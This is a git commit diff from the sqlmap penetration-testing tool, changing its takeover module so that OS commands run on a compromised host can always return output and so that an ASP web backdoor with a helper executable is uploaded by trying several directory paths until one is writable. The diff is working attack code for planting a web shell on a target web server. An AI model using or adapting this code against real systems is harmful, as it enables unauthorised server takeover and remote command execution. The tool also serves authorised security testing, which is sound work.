more feature updates

stamparm · stamparm · commit b558712a4741 · 2010-02-25T11:40:49.000Z
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
@@ -41,6 +41,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 
     def __init__(self):
         self.envInitialized = False
+        self.alwaysRetrieveCmdOutput = False
 
         UDF.__init__(self)
         Web.__init__(self)
@@ -77,11 +78,15 @@ def evalCmd(self, cmd, first=None, last=None):
     def runCmd(self, cmd):
         getOutput = None
 
-        message   = "do you want to retrieve the command standard "
-        message  += "output? [Y/n] "
-        getOutput = readInput(message, default="Y")
+        if not self.alwaysRetrieveCmdOutput:
+            message   = "do you want to retrieve the command standard "
+            message  += "output? [Y/n/a] "
+            getOutput = readInput(message, default="Y")
+            
+            if getOutput in ("a", "A"):
+                self.alwaysRetrieveCmdOutput = True
 
-        if not getOutput or getOutput in ("y", "Y"):
+        if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
             output = self.evalCmd(cmd)
 
             if output:
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
@@ -169,7 +169,7 @@ def webInit(self):
 
         backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
         backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
-        backdoorContent = backdoorStream.read()
+        originalBackdoorContent = backdoorContent = backdoorStream.read()
         
         uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
         uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
@@ -200,20 +200,24 @@ def webInit(self):
             logger.info(infoMsg)
             
             if self.webApi == "asp":
+                scriptsDirectory = "Scripts"
                 runcmdName = "tmpe%s.exe" % randomStr(4)
                 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
-                scriptsDirectory = "Scripts"
-                backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
-                backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
-                backdoorStream.file.truncate()
-                backdoorStream.read()
-                backdoorStream.seek(0)
-                backdoorStream.write(backdoorContent)
-                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
-                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
-                    self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
-                    self.webDirectory = directory
-                else:
+                backdoorUploaded = False
+                for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
+                    backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
+                    backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                    backdoorStream.file.truncate()
+                    backdoorStream.read()
+                    backdoorStream.seek(0)
+                    backdoorStream.write(backdoorContent)
+                    if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                        self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                        self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
+                        self.webDirectory = backdoorDirectory
+                        backdoorUploaded = True
+                        break
+                if not backdoorUploaded:
                     continue
             elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
                 warnMsg  = "backdoor hasn't been successfully uploaded "
@@ -231,7 +235,7 @@ def webInit(self):
                 self.webDirectory = directory
                 
             infoMsg  = "the backdoor has probably been successfully "
-            infoMsg += "uploaded on '%s', go with your browser " % directory
+            infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
             infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
             logger.info(infoMsg)
 
